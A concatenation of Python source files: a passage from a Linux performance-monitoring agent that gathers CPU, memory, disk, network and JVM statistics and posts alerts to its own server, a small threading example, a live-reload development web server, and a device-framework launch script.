logger.warning(msg) if self.isCPUAlert and cpu_flag: cpu_flag = False # Set to False to prevent sending email continuously thread = threading.Thread(target=notification, args=(msg,)) thread.start() else: cpu_flag = True # If CPU usage is normally, reset it to True if res['mem'] <= self.minMem: msg = f"{self.IP} system free memory is {res['mem']}G, it is too low." logger.warning(msg) if self.isMemAlert and mem_flag: mem_flag = False # Set to False to prevent sending email continuously thread = threading.Thread(target=notification, args=(msg, )) thread.start() if self.echo and echo: echo = False # Set to False to prevent cleaning up cache continuously thread = threading.Thread(target=self.clear_cache, args=()) thread.start() else: mem_flag = True # If free memory is normally, reset it to True. echo = True except(Exception): logger.error(traceback.format_exc()) time.sleep(self.system_interval) else: time.sleep(3) @handle_exception(is_return=True, default_value=(None, None)) def get_cpu_mem(self, pid): """ Get CPU usage and Memory of pid. Now it is not used :param pid: pid :return: CPU usage(%), Memory(G) """ cpu = None mem = None # result = os.popen(f'top -n 1 -b -p {pid}').readlines() result = os.popen(f'top -n 1 -b |grep -P {pid}').readlines() res = [ress.split() for ress in result] logger.debug(f'The CPU and Mem of pid {pid} is: {res}') for r in res: if str(pid) == r[0]: ind = r.index(str(pid)) cpu = float(r[ind + 8]) / self.cpu_cores # CPU usage mem = float(r[ind + 9]) * self.total_mem_100 # Memory return cpu, mem @handle_exception(is_return=True, default_value=[]) def get_pid_cpu_mem_io(self, pid): """ Get CPU usage, Memor, and disk of pid. 
:param pid: pid :return: CPU usage(%), Memory(G), Disk Read and Write(kB/s) """ pid_info = {'kB_rd': 0.0, 'kB_wr': 0.0, 'iodelay': 0.0, 'VSZ': 0.0, 'RSS': 0.0, 'mem': 0.0, 'usr_cpu': 0.0, 'system_cpu': 0.0, 'guest_cpu': 0.0, 'wait_cpu': 0.0, 'cpu': 0.0} res = os.popen(f'pidstat -u -r -d -p {pid} 1 1').readlines()[::-1][:9] if res: for i in range(len(res)): if 'iodelay' in res[i]: io = res[i - 1].split() pid_info['kB_rd'] = float(io[3]) / 1024 # Read from disk per second (kB) pid_info['kB_wr'] = float(io[4]) / 1024 # Write to disk per second (kB) # pid_info['iodelay'] = float(io[6]) # I/O delay(unit: clock cycle) if 'MEM' in res[i]: memory = res[i - 1].split() # pid_info['VSZ'] = float(memory[5]) / 1024 # Virtual memory # pid_info['RSS'] = float(memory[6]) / 1024 # Physical memory pid_info['mem'] = float(memory[7]) * self.total_mem_100 # Memory size if 'CPU' in res[i]: cpu_res = res[i - 1].split() # pid_info['usr_cpu'] = float(cpu_res[3]) / self.cpu_cores # pid_info['system_cpu'] = float(cpu_res[4]) / self.cpu_cores # pid_info['guest_cpu'] = float(cpu_res[5]) / self.cpu_cores # pid_info['wait_cpu'] = float(cpu_res[6]) / self.cpu_cores # CPU usage waiting for context switch pid_info['cpu'] = float(cpu_res[7]) / self.cpu_cores # CPU usage return pid_info else: return res @handle_exception(is_return=True, default_value=0) def get_jvm(self, port, pid): """ JVM size :param port: port :param pid: pid :return: jvm(G) """ result = os.popen(f'jstat -gc {pid}').readlines()[1] res = result.strip().split() logger.debug(f'The JVM of pid {pid} is: {res}') mem = float(res[2]) + float(res[3]) + float(res[5]) + float(res[7]) # calculate JVM fgc = int(res[14]) if self.FGC[str(port)] < fgc: # If the times of FGC increases self.FGC[str(port)] = fgc self.FGC_time[str(port)].append(time.time()) if len(self.FGC_time[str(port)]) > 2: # Calculate FGC frequency frequency = self.FGC_time[str(port)][-1] - self.FGC_time[str(port)][-2] if frequency < self.frequencyFGC: # If FGC frequency is too 
high, send email. msg = f'The Full GC frequency of port {port} is {frequency}, it is too high. Server IP: {self.IP}' logger.warning(msg) if self.isJvmAlert: thread = threading.Thread(target=notification, args=(msg, )) thread.start() # Write FGC times and time to log logger.warning(f"The port {port} has Full GC {self.FGC[str(port)]} times.") elif self.FGC[str(port)] > fgc: # If the times of FGC is reduced, the port may be restarted, then reset it self.FGC[str(port)] = 0 if self.FGC[str(port)] == 0: # If the times of FGC is 0, reset FGC time. self.FGC_time[str(port)] = [] return mem / 1048576 # 1048576 = 1024 * 1024 @handle_exception(is_return=True, default_value={}) def get_system_cpu_io_speed(self): """ Get system CPU usage, memory, disk IO, network speed, etc. :return: """ disk = {} disk_r = {} disk_w = {} disk_d = {} cpu = None iowait = None usr_cpu = None bps1 = None bps2 = None rece = None trans = None network = None if self.nic: bps1 = os.popen(f'cat /proc/net/dev |grep {self.nic}').readlines() logger.debug(f'The result of speed for the first time is: {bps1}') result = os.popen('iostat -x -m 1 2').readlines() logger.debug(f'The result of Disks are: {result}') if self.nic: bps2 = os.popen(f'cat /proc/net/dev |grep {self.nic}').readlines() logger.debug(f'The result of speed for the second time is: {bps2}') result = result[len(result) // 2 - 1:] disk_res = [line.strip() for line in result if len(line) > 5] for i in range(len(disk_res)): if 'avg-cpu' in disk_res[i]: cpu_res = disk_res[i + 1].strip().split() # Free CPU cpu = 100 - float(cpu_res[-1]) # CPU usage iowait = float(cpu_res[-3]) usr_cpu = float(cpu_res[0]) logger.debug(f'System CPU usage rate is: {cpu}%') continue if 'Device' in disk_res[i]: for j in range(i+1, len(disk_res)): disk_line = disk_res[j].split() disk_num = disk_line[0].replace('-', '') disk.update({disk_num: float(disk_line[-1])}) # IO disk_r.update({disk_num + '_r': float(disk_line[2])}) # Read MB/s disk_w.update({disk_num + '_w': 
float(disk_line[8])}) # Write MB/s disk_d.update({disk_num + '_d': float(disk_line[14])}) # MB/s logger.debug(f'The result of disks are: IO: {disk}, Read: {disk_r}, Write: {disk_w}') break mem, mem_available = self.get_free_memory() if bps1 and bps2: data1 = bps1[0].split() data2 = bps2[0].split() rece = (int(data2[1]) - int(data1[1])) / 1048576 trans = (int(data2[9]) - int(data1[9])) / 1048576 # 400 = 8 * 100 / 2 # Why multiply by 8, because 1MB/s = 8Mb/s. # Why divided by 2, because the network card is in full duplex mode. network = 400 * (rece + trans) / self.network_speed logger.debug(f'The bandwidth of ethernet is: Receive {rece}MB/s, Transmit {trans}MB/s, Ratio {network}%') tcp, Retrans = self.get_tcp() return {'disk': disk, 'disk_r': disk_r, 'disk_w': disk_w, 'disk_d': disk_d, 'cpu': cpu, 'iowait': iowait, 'usr_cpu': usr_cpu, 'mem': mem, 'mem_available': mem_available, 'rece': rece, 'trans': trans, 'network': network, 'tcp': tcp, 'retrans': Retrans} @staticmethod def get_free_memory(): """ Get system memory :return: free Memory, available Memory """ mem, mem_available = 0, 0 result = os.popen('cat /proc/meminfo').readlines() logger.debug(f'The free memory is: {result}') for res in result: if 'MemFree' in res: mem = int(res.split(':')[-1].split('k')[0].strip()) / 1048576 # 1048576 = 1024 * 1024 continue if 'MemAvailable' in res: mem_available = int(res.split(':')[-1].split('k')[0].strip()) / 1048576 # 1048576 = 1024 * 1024 continue if mem and mem_available: break return mem, mem_available '''def get_handle(pid): """ Get the number of handles occupied by the process :param pid: pid :return: the number of handles """ result = os.popen("lsof -n | awk '{print $2}'| sort | uniq -c | sort -nr | " + "grep {}".format(pid)).readlines() res = result[0].strip().split(' ') logger.debug(res) handles = None if str(pid) in res: handles = int(res[0]) return handles''' @handle_exception(is_return=True, default_value=(0, 0)) def get_tcp(self): """ Get the number of TCP and 
calculate the retransmission rate :return: """ tcp = 0 Retrans = 0 if self.isTCP: result = os.popen('cat /proc/net/snmp |grep Tcp').readlines() tcps = result[-1].split() logger.debug(f'The TCP is: {tcps}') tcp = int(tcps[9]) # TCP connections Retrans = int(tcps[-4]) - self.Retrans_num self.Retrans_num = int(tcps[-4]) return tcp, Retrans @handle_exception(is_return=True, default_value={}) def get_port_tcp(self, port): """ Get the number of TCP connections for the port :param port: port :return: """ tcp_num = {} res = os.popen(f'netstat -ant |grep {port}').read() tcp_num.update({'tcp': res.count('tcp')}) tcp_num.update({'established': res.count('ESTABLISHED')}) tcp_num.update({'close_wait': res.count('CLOSE_WAIT')}) tcp_num.update({'time_wait': res.count('TIME_WAIT')}) return tcp_num def get_cpu_cores(self): """ Get CPU information :return: """ cpu_model = None cpu_num = 0 cpu_core = 0 try: result = os.popen('cat /proc/cpuinfo | grep "model name" |uniq').readlines()[0] cpu_model = result.strip().split(':')[1].strip() logger.info(f'The CPU model is {cpu_model}') except Exception as err: logger.error('The CPU model is not found.') logger.error(err) try: result = os.popen('cat /proc/cpuinfo | grep "physical id" | uniq | wc -l').readlines()[0] cpu_num = int(result) logger.info(f'The number of CPU is {cpu_num}') except Exception as err: logger.error('The number of CPU is not found.') logger.error(err) try: result = os.popen('cat /proc/cpuinfo | grep "cpu cores" | uniq').readlines()[0] cpu_core = int(result.strip().split(':')[1].strip()) logger.info(f'The number of cores per CPU is {cpu_core}') except Exception as err: logger.error('The number of cores per CPU is not found.') logger.error(err) result = os.popen('cat /proc/cpuinfo| grep "processor"| wc -l').readlines()[0] self.cpu_cores = int(result) logger.info(f'The number of cores all CPU is {self.cpu_cores}') if cpu_model and cpu_num and cpu_core: self.cpu_info = f'{cpu_num} CPU(s), {cpu_core} core(s) pre CPU, total 
{self.cpu_cores} cores, ' \ f'CPU model is {cpu_model} ' elif cpu_model: self.cpu_info = f'total CPU cores is {self.cpu_cores}, CPU model is {cpu_model} ' else: self.cpu_info = f'total CPU cores is {self.cpu_cores}' @handle_exception(is_return=True) def get_total_mem(self): """ Get Memory :return: """ result = os.popen('cat /proc/meminfo| grep "MemTotal"').readlines()[0] self.total_mem = float(result.split(':')[-1].split('k')[0].strip()) / 1048576 # 1048576 = 1024 * 1024 self.total_mem_100 = self.total_mem / 100 logger.info(f'The total memory is {self.total_mem}G') @handle_exception() def get_disks(self): """ Get all disks number. :return: """ result = os.popen('iostat -x -k').readlines() if result: disk_res = [line.strip() for line in result if len(line) > 5] for i in range(len(disk_res)): if 'Device' in disk_res[i]: for j in range(i + 1, len(disk_res)): disk_line = disk_res[j].split() self.all_disk.append(disk_line[0]) logger.info(f'The system has {len(self.all_disk)} disks, disk number is {"、".join(self.all_disk)}') else: raise Exception('The system does not support the iostat, please install sysstat. ') @handle_exception(is_return=True) def get_system_nic(self): """ Get network card. Only one network card can be got. If the system uses multiple network cards, only the first one can be got. Use "cat /proc/net/dev" to view the order of the network cards. 
:return: """ network_card = [] result = os.popen('cat /proc/net/dev').readlines() # get network data logger.debug(f'The result for the first time is: {result}') time.sleep(1) result1 = os.popen('cat /proc/net/dev').readlines() # get network data again logger.debug(f'The result for the second time is: {result1}') for i in range(len(result)): if ':' in result[i]: data = result[i].split() data1 = result1[i].split() if data[0] == data1[0]: logger.debug(f'The first data change is {data}') logger.debug(f'The second data change is {data1}') if data[1] != data1[1] or data[9] != data1[ 9]: # If the data of network card changes, it means that the card is in use. network_card.append(data[0].strip(':')) logger.debug(f'The data of network card is {network_card}') if 'lo' in network_card: # 'lo' is 127.0.0.1, need to be deleted. network_card.pop(network_card.index('lo')) if len(network_card) > 0: self.nic = network_card[0] logger.info(f'The network card in use is {self.nic}') else: logger.error('The network card in use is not found.') @handle_exception(is_return=True) def get_total_disk_size(self): """ Get disk size :return: """ result = os.popen('df -m').readlines() logger.debug(f'The data of disk is {result}') for line in result: res = line.split() if '/dev/' in res[0]: size = float(res[1]) self.total_disk += size logger.debug(f'The disks total size is {self.total_disk}M') self.total_disk_h = self.total_disk / 1024 if self.total_disk_h > 1024: total = round(self.total_disk_h / 1024, 2) self.total_disk_h = f'{total}T' else: total = round(self.total_disk_h, 2) self.total_disk_h = f'{total}G' logger.info(f'The total size of disks is {self.total_disk_h}') @handle_exception(is_return=True, default_value=0) def get_used_disk_rate(self): """ Get disks usage :return: """ used_disk_size = 0 result = os.popen('df -m').readlines() logger.debug(f'The data of disk is {result}') for line in result: res = line.split() if '/dev/' in res[0]: size = float(res[2]) used_disk_size += size 
logger.info(f'The used size of disks is {used_disk_size}M') return used_disk_size / self.total_disk @handle_exception(is_return=True) def get_system_net_speed(self): """ Get bandwidth, Mbs :return: """ if self.nic: result = os.popen(f'ethtool {self.nic}').readlines() logger.debug(f'The bandwidth is {result}') for line in result: if 'Speed' in line: logger.debug(f'The bandwidth is {line}') res = re.findall(r"(\d+)", line) speed = int(res[0]) if 'G' in line: speed = speed * 1024 if 'K' in line: speed = speed / 1024 self.network_speed = speed break logger.info(f'The bandwidth of ethernet is {self.network_speed}Mb/s') @handle_exception(is_return=True) def get_system_version(self): """ Get system version :return: """ try: result = os.popen('cat /etc/redhat-release').readlines() # system release version logger.debug(f'The system release version is {result}') self.system_version = result[0].strip() except Exception as err: logger.warning(err) result = os.popen('cat /proc/version').readlines()[0] # system kernel version logger.debug(f'The system kernel version is{result}') res = re.findall(r"gcc.*\((.*?)\).*GCC", result.strip()) if res: self.system_version = res[0] else: res = re.findall(r"gcc.*\((.*?)\)", result.strip()) self.system_version = res[0] logger.info(f'system release/kernel version is {self.system_version}') @handle_exception(is_return=True, default_value=0) def get_RetransSegs(self): """ Get the number of TCP RetransSegs :return: """ Retrans = 0 if self.isTCP: result = os.popen('cat /proc/net/snmp |grep Tcp').readlines() tcps = result[-1].split() logger.debug(f'The TCP is: {tcps}') Retrans = int(tcps[-4]) return Retrans def is_java_server(self, port): """ Determine whether the port is java service :param port: port """ pid = port_to_pid(port) try: result = os.popen(f'jstat -gc {pid} |tr -s " "').readlines()[1] res = result.strip().split(' ') logger.info(f'The JVM of {pid} is {res}') _ = float(res[2]) + float(res[3]) + float(res[5]) + float(res[7]) 
self.is_java.update({str(port): 1}) except Exception as err: logger.warning(err) self.is_java.update({str(port): 0}) def check_sysstat_version(self): """ Check sysstat version """ try: version = os.popen("iostat -V |grep ysstat |awk '{print $3}' |awk -F '.' '{print $1}'").readlines()[0] v = int(version.strip()) if v < 12: msg = 'The iostat version is too low, please upgrade to version 12+, download link: ' \ 'http://sebastien.godard.pagesperso-orange.fr/download.html' logger.error(msg) raise Exception(msg) except IndexError: logger.error(traceback.format_exc()) msg = 'Please upgrade sysstat to version 12+, download link: ' \ 'http://sebastien.godard.pagesperso-orange.fr/download.html' logger.error(msg) raise Exception(msg) try: version = os.popen("pidstat -V |grep ysstat |awk '{print $3}' |awk -F '.' '{print $1}'").readlines()[0] v = int(version.strip()) if v < 12: msg = 'The pidstat version is too low, please upgrade to version 12+, download link: ' \ 'http://sebastien.godard.pagesperso-orange.fr/download.html' logger.error(msg) raise Exception(msg) except IndexError: logger.error(traceback.format_exc()) msg = 'Please upgrade sysstat to version 12+, download link: ' \ 'http://sebastien.godard.pagesperso-orange.fr/download.html' logger.error(msg) raise Exception(msg) @handle_exception(is_return=True) def clear_port(self): """ Clean up ports that have been stopped monitoring :return: """ stop_num = self._msg['isRun'].count(0) if stop_num > 0: port_list = copy.deepcopy(self._msg) # stop all monitoring for ind in range(len(self._msg['port'])): if self._msg['isRun'][ind] > 0: self._msg['isRun'][ind] = 0 self.FGC = {} # reset FGC times self.FGC_time = {} # reset FGC time self.is_java = {} time.sleep(self.port_interval + 5) # Wait for all ports to stop monitoring self._msg = {'port': [], 'pid': [], 'isRun': [], 'startTime': []} # Start monitoring again for ind in range(len(port_list['port'])): if port_list['isRun'][ind] > 0: self.start = {'port': port_list['port'][ind], 
'pid': port_list['pid'][ind], 'is_run': 1} del port_list logger.info('Successfully clean up the ports that stopped monitoring.') else: logger.info('There is no port that stoped monitoring.') def register_agent(self, disk_flag=True): """ Timed task. One is register, the other one is clean up the ports that stopped monitoring. disk_flag: Whether to send email when disk space usage is too high. :param :return: """ url = f'http://{cfg.getServer("host")}:{cfg.getServer("port")}/Register' header = { "Accept": "application/json, text/plain, */*", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/json; charset=UTF-8"} post_data = { 'host': self.IP, 'port': cfg.getAgent('port'), 'system': self.system_version, 'cpu': self.cpu_cores, 'cpu_usage': self.cpu_usage, 'nic': self.nic, 'network_speed': self.network_speed, 'mem': round(self.total_mem, 2), 'mem_usage': self.mem_usage, 'disk_size': self.total_disk_h, 'disk_usage': self.get_used_disk_rate(), 'disks': ','.join(self.all_disk) } start_time = time.time() disk_start_time = time.time() while True: try: if time.time() - start_time > 8: # register post_data['cpu_usage'] = self.cpu_usage post_data['mem_usage'] = self.mem_usage res = requests.post(url=url, json=post_data, headers=header) logger.info(f"The result of registration is {res.content.decode('unicode_escape')}") start_time = time.time() if time.strftime('%H:%M') == self.timeSetting: # clean up logger.debug('Cleaning up the ports that stopped monitoring.') self.clear_port() if time.time() - disk_start_time > 300: disk_usage = self.get_used_disk_rate() if disk_usage: post_data['disk_usage'] = disk_usage # disk space usage, without % disk_start_time = time.time() if self.maxDiskUsage < disk_usage: msg = f"The disk space usage is {disk_usage/100:.2f}%, it is too high. 
Server IP is {self.IP}" logger.warning(msg) if self.isDiskAlert and disk_flag: disk_flag = False # Set to False to prevent cleaning up cache continuously thread = threading.Thread(target=notification, args=(msg,)) thread.start() else: disk_flag = True time.sleep(5) except(Exception): logger.error(traceback.format_exc()) time.sleep(1) def clear_cache(self): """ Cleaning up cache. :return: """ logger.info(f'Start Cleaning up cache: echo {self.echo} > /proc/sys/vm/drop_caches') os.popen(f'echo {self.echo} > /proc/sys/vm/drop_caches') logger.info('Clear the cache successfully.') def __del__(self): pass @handle_exception(is_return=True) def port_to_pid(port): """ Get pid based on port :param port: port :return: pid """ pid = None result = os.popen(f'netstat -nlp|grep {port}').readlines() logger.debug(f'The result of the port {port} is {result}') flag = f':{port}' res = [line.strip() for line in result if flag in line] logger.debug(res[0]) p = res[0].split() pp = p[3].split(':')[-1] if str(port) == pp: pid = p[p.index('LISTEN') + 1].split('/')[0] logger.info(f'The pid of the port {port} is {pid}.') return pid @handle_exception(is_return=True) def notification(msg): """ Send email. :param msg: Email body :return: """ url = f'http://{cfg.getServer("host")}:{cfg.getServer("port")}/Notification' header = { "Accept": "application/json, text/plain, */*", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/json; charset=UTF-8"} post_data = { 'host': get_ip(), 'msg': msg } logger.debug(f'The content of the email is {msg}') res = requests.post(url=url, json=post_data, headers=header) if res.status_code == 200: response = json.loads(res.content.decode()) if response['code'] == 0: logger.info('Send email successfully.') else: logger.error(response['msg']) else: logger.error('Failed to send mail.')
# ===== threading_2.py =====
"""Create thread instances by passing a callable class instance as the target."""
import threading
from time import sleep, ctime

loops = [4, 2]


class ThreadFunc(object):
    """Callable wrapper that stores a function plus its arguments for deferred invocation."""

    def __init__(self, func, args, name=""):
        self.name = name
        self.func = func
        self.args = args

    def __call__(self):
        # Invoked by threading.Thread when the thread starts.
        self.func(*self.args)


def loop(nloop, nsec):
    """Sleep for *nsec* seconds, announcing start and finish times."""
    print("Start loop", nloop, " at: ", ctime())
    sleep(nsec)
    print("loop", nloop, "done at: ", ctime())


def main():
    """Spawn one thread per entry in ``loops`` and wait for all of them."""
    print("Starting at: ", ctime())
    # Build every worker up front, then start them, then join them —
    # same three-phase structure as before, expressed over the thread list.
    workers = [
        threading.Thread(target=ThreadFunc(loop, (idx, delay), loop.__name__))
        for idx, delay in enumerate(loops)
    ]
    for worker in workers:  # Start all threads
        worker.start()
    for worker in workers:  # Wait for completion
        worker.join()
    print("All done at: ", ctime())


if __name__ == "__main__":
    main()
# ===== __init__.py =====
"""Live-reloading development web server: watches source paths, rebuilds on
change, and stalls browser poll requests until a fresh build is visible."""
import functools
import io
import logging
import mimetypes
import os
import os.path
import posixpath
import re
import socketserver
import threading
import time
import warnings
import wsgiref.simple_server

import watchdog.events
import watchdog.observers.polling


class _LoggerAdapter(logging.LoggerAdapter):
    # Prefixes every log message with a wall-clock timestamp, e.g. "[12:34:56] msg".
    def process(self, msg, kwargs):
        return time.strftime("[%H:%M:%S] ") + msg, kwargs


log = _LoggerAdapter(logging.getLogger(__name__), {})


class LiveReloadServer(socketserver.ThreadingMixIn, wsgiref.simple_server.WSGIServer):
    daemon_threads = True
    poll_response_timeout = 60  # Max seconds a /livereload poll is stalled before replying anyway.

    def __init__(
        self,
        builder,
        host,
        port,
        root,
        mount_path="/",
        polling_interval=0.5,
        shutdown_delay=0.25,
        **kwargs,
    ):
        self.builder = builder  # Callable that rebuilds the site; also the default watch() target.
        self.server_name = host
        self.server_port = port
        self.root = os.path.abspath(root)  # Directory the static files are served from.
        # Normalized so it always has exactly one leading and one trailing slash.
        self.mount_path = ("/" + mount_path.lstrip("/")).rstrip("/") + "/"
        self.url = f"http://{self.server_name}:{self.server_port}{self.mount_path}"
        self.build_delay = 0.1  # Debounce window: wait this long for file events to stop.
        self.shutdown_delay = shutdown_delay
        # To allow custom error pages.
        self.error_handler = lambda code: None

        super().__init__((host, port), _Handler, **kwargs)
        self.set_app(self.serve_request)

        self._wanted_epoch = _timestamp()  # The version of the site that started building.
        self._visible_epoch = self._wanted_epoch  # Latest fully built version of the site.
        self._epoch_cond = threading.Condition()  # Must be held when accessing _visible_epoch.

        self._to_rebuild = {}  # Used as an ordered set of functions to call.
        self._rebuild_cond = threading.Condition()  # Must be held when accessing _to_rebuild.

        self._shutdown = False
        self.serve_thread = threading.Thread(target=lambda: self.serve_forever(shutdown_delay))
        self.observer = watchdog.observers.polling.PollingObserver(timeout=polling_interval)

    def watch(self, path, func=None, recursive=True):
        """Add the 'path' to watched paths, call the function and reload when any file changes under it."""
        path = os.path.abspath(path)
        # Custom callbacks are deprecated; anything other than the builder just warns.
        if func in (None, self.builder):
            func = self.builder
        else:
            warnings.warn(
                "Plugins should not pass the 'func' parameter of watch(). "
                "The ability to execute custom callbacks will be removed soon.",
                DeprecationWarning,
                stacklevel=2,
            )

        def callback(event):
            # Directory events are noise; only file changes trigger a rebuild.
            if event.is_directory:
                return
            log.debug(str(event))
            with self._rebuild_cond:
                self._to_rebuild[func] = True
                self._rebuild_cond.notify_all()

        handler = watchdog.events.FileSystemEventHandler()
        handler.on_any_event = callback

        log.debug(f"Watching '{path}'")
        self.observer.schedule(handler, path, recursive=recursive)

    def serve(self):
        """Start the watcher and HTTP thread, then run the (blocking) build loop."""
        self.observer.start()

        log.info(f"Serving on {self.url}")
        self.serve_thread.start()

        self._build_loop()

    def _build_loop(self):
        # Runs on the caller's thread until shutdown(): wait for change
        # notifications, debounce, rebuild, then publish the new epoch.
        while True:
            with self._rebuild_cond:
                while not self._rebuild_cond.wait_for(
                    lambda: self._to_rebuild or self._shutdown, timeout=self.shutdown_delay
                ):
                    # We could have used just one wait instead of a loop + timeout, but we need
                    # occasional breaks, otherwise on Windows we can't receive KeyboardInterrupt.
                    pass
                if self._shutdown:
                    break
                log.info("Detected file changes")
                # Debounce: keep absorbing notifications until they stop for build_delay seconds.
                while self._rebuild_cond.wait(timeout=self.build_delay):
                    log.debug("Waiting for file changes to stop happening")

                self._wanted_epoch = _timestamp()
                funcs = list(self._to_rebuild)
                self._to_rebuild.clear()

            # Build outside the lock so new change events can queue up meanwhile.
            for func in funcs:
                func()

            with self._epoch_cond:
                log.info("Reloading browsers")
                self._visible_epoch = self._wanted_epoch
                self._epoch_cond.notify_all()

    def shutdown(self):
        """Stop the watcher, the build loop, and the HTTP thread, then join them."""
        self.observer.stop()
        with self._rebuild_cond:
            self._shutdown = True
            self._rebuild_cond.notify_all()

        if self.serve_thread.is_alive():
            super().shutdown()
        self.serve_thread.join()
        self.observer.join()

    def serve_request(self, environ, start_response):
        # WSGI app entry point: delegate, mapping exceptions to 500 and
        # "nothing served" (None) to 404, with optional custom error pages.
        try:
            result = self._serve_request(environ, start_response)
        except Exception:
            code = 500
            msg = "500 Internal Server Error"
            log.exception(msg)
        else:
            if result is not None:
                return result
            code = 404
            msg = "404 Not Found"

        error_content = None
        try:
            error_content = self.error_handler(code)
        except Exception:
            log.exception("Failed to render an error message!")
        if error_content is None:
            error_content = msg.encode()

        start_response(msg, [("Content-Type", "text/html")])
        return [error_content]

    def _serve_request(self, environ, start_response):
        # https://bugs.python.org/issue16679
        # https://github.com/bottlepy/bottle/blob/f9b1849db4/bottle.py#L984
        path = environ["PATH_INFO"].encode("latin-1").decode("utf-8", "ignore")

        # Long-poll endpoint: /livereload/<epoch>/<request-id>
        m = re.fullmatch(r"/livereload/([0-9]+)/[0-9]+", path)
        if m:
            epoch = int(m[1])
            start_response("200 OK", [("Content-Type", "text/plain")])

            def condition():
                return self._visible_epoch > epoch

            with self._epoch_cond:
                if not condition():
                    # Stall the browser, respond as soon as there's something new.
                    # If there's not, respond anyway after a minute.
                    self._log_poll_request(environ.get("HTTP_REFERER"), request_id=path)
                    self._epoch_cond.wait_for(condition, timeout=self.poll_response_timeout)
                return [b"%d" % self._visible_epoch]

        if path == "/js/livereload.js":
            file_path = os.path.join(os.path.dirname(os.path.abspath(__file__)), "livereload.js")
        elif path.startswith(self.mount_path):
            rel_file_path = path[len(self.mount_path):]
            if path.endswith("/"):
                rel_file_path += "index.html"
            # Prevent directory traversal - normalize the path.
            rel_file_path = posixpath.normpath("/" + rel_file_path).lstrip("/")
            file_path = os.path.join(self.root, rel_file_path)
        elif path == "/":
            start_response("302 Found", [("Location", self.mount_path)])
            return []
        else:
            return None  # Not found

        # Wait until the ongoing rebuild (if any) finishes, so we're not serving a half-built site.
        with self._epoch_cond:
            self._epoch_cond.wait_for(lambda: self._visible_epoch == self._wanted_epoch)
            epoch = self._visible_epoch

        try:
            file = open(file_path, "rb")
        except OSError:
            # A directory was requested without a trailing slash: redirect to it.
            if not path.endswith("/") and os.path.isfile(os.path.join(file_path, "index.html")):
                start_response("302 Found", [("Location", path + "/")])
                return []
            return None  # Not found

        if file_path.endswith(".html"):
            with file:
                content = file.read()
            content = self._inject_js_into_html(content, epoch)
            file = io.BytesIO(content)
            content_length = len(content)
        else:
            content_length = os.path.getsize(file_path)

        content_type = self._guess_type(file_path)
        start_response(
            "200 OK", [("Content-Type", content_type), ("Content-Length", str(content_length))]
        )
        # NOTE(review): relies on `wsgiref.util` being reachable as an attribute even though
        # only `wsgiref.simple_server` is imported — works via transitive imports, but an
        # explicit `import wsgiref.util` would be safer; confirm before changing.
        return wsgiref.util.FileWrapper(file)

    @classmethod
    def _inject_js_into_html(cls, content, epoch):
        # Insert the livereload script just before </body> (or at the end if absent).
        try:
            body_end = content.rindex(b"</body>")
        except ValueError:
            body_end = len(content)
        # The page will reload if the livereload poller returns a newer epoch than what it knows.
        # The other timestamp becomes just a unique identifier for the initiating page.
        return (
            b'%b<script src="/js/livereload.js"></script><script>livereload(%d, %d);</script>%b'
            % (content[:body_end], epoch, _timestamp(), content[body_end:])
        )

    @classmethod
    @functools.lru_cache()  # "Cache" to not repeat the same message for the same browser tab.
    def _log_poll_request(cls, url, request_id):
        log.info(f"Browser connected: {url}")

    # NOTE(review): first parameter is named `cls` but there is no @classmethod decorator,
    # so this actually runs as an instance method (cls receives the instance). Harmless as
    # called via `self._guess_type(...)`, but presumably meant to be a classmethod — confirm.
    def _guess_type(cls, path):
        # MkDocs only ensures a few common types (as seen in livereload_tests.py::test_mime_types).
        # Other uncommon types will not be accepted.
        if path.endswith((".js", ".JS")):
            return "application/javascript"
        if path.endswith(".gz"):
            return "application/gzip"

        guess, _ = mimetypes.guess_type(path)
        if guess:
            return guess
        return "application/octet-stream"


class _Handler(wsgiref.simple_server.WSGIRequestHandler):
    # Route the stdlib request handler's logging through our timestamped logger.
    def log_request(self, code="-", size="-"):
        level = logging.DEBUG if str(code) == "200" else logging.WARNING
        log.log(level, f'"{self.requestline}" code {code}')

    def log_message(self, format, *args):
        log.debug(format, *args)


def _timestamp():
    # Monotonic milliseconds — used as the site "epoch" compared by the poller.
    return round(time.monotonic() * 1000)
# ===== launchPad.py =====
# NOTE: These modules were previously imported with the 'Device_Level.' package
# prefix; see version control history if the old absolute paths are needed.
from Framework.Base_Classes import dataPipe
from Framework.Base_Classes import managementPipe
from Framework.Managers.deviceManager import deviceManager
from Framework.Controllers.commandController import CommandController
from Framework.Controllers.dataController import DataController
from Framework.Controllers.managmentController import ManagementController
from Framework.Launcher.localLauncher import Launcher
from Framework.Test_Sweet.deviceMangerTester import DMTest as DMT

from threading import Thread
import json
import traceback
import logging
import time

CONFIG_PATH = 'Framework/Totality_Config/deviceConfig.json'

"""
Launch Pad is the main starter to run EVERYTHING. It will read in from the configuration file and find 3 things:
The launcher, the data Controller, and the command controller. See those respective classes or the README for what they do.
"""

if __name__ == '__main__':
    try:
        # Load the device configuration; everything below is driven by it.
        with open(CONFIG_PATH) as configFile:
            config = json.load(configFile)
        DID = config["deviceID"]
        logging.basicConfig(level=config["logLevel"], filename='program.log', filemode='w',
                            format='%(asctime)s - %(levelname)s - %(message)s')
        logging.info("\n\nLaunching Program")
        # Rebind the imported modules' names to live pipe instances (matches the
        # original module's convention of shadowing dataPipe/managementPipe).
        dataPipe = dataPipe.DataPipe()
        if not config["localOnly"]:
            managementPipe = managementPipe.ManagementPipe()
        else:
            managementPipe = None
        # 'manegementPipe' is the keyword name deviceManager actually declares.
        DM = deviceManager(pipe=dataPipe, manegementPipe=managementPipe, deviceID=DID,
                           test=config["test"], threadLimit=config["threadLimit"],
                           configPath=CONFIG_PATH, localOnly=config["localOnly"])
        # Only create a Launcher when the config provides non-empty launcher args.
        useLauncher = False
        if config["launcher"]["args"] != 'None' and bool(config["launcher"]["args"]):
            launcher = Launcher(**config["launcher"]["args"], deviceManager=DM)
            useLauncher = True
        # The CommandController import is kept for parity with the config schema,
        # but command-control threads are currently disabled.
        dataController = DataController(**config["dataControl"]["args"],
                                        localOnly=config["localOnly"],
                                        pipe=dataPipe, deviceID=DID)
        managementController = ManagementController(**config["managementController"]["args"],
                                                    pipe=managementPipe, deviceID=DID, DM=DM)
        if useLauncher:
            LT = Thread(target=launcher.starter, name="Launcher_Thread")
            LT.start()
        DCThread = Thread(target=dataController.starter, name="DC_Thread")
        if not config["localOnly"]:
            MCThread = Thread(target=managementController.starter, name="MC_Thread")
            MCThread.start()
        DCThread.start()
        logging.info("All Threads Launched Successfully")
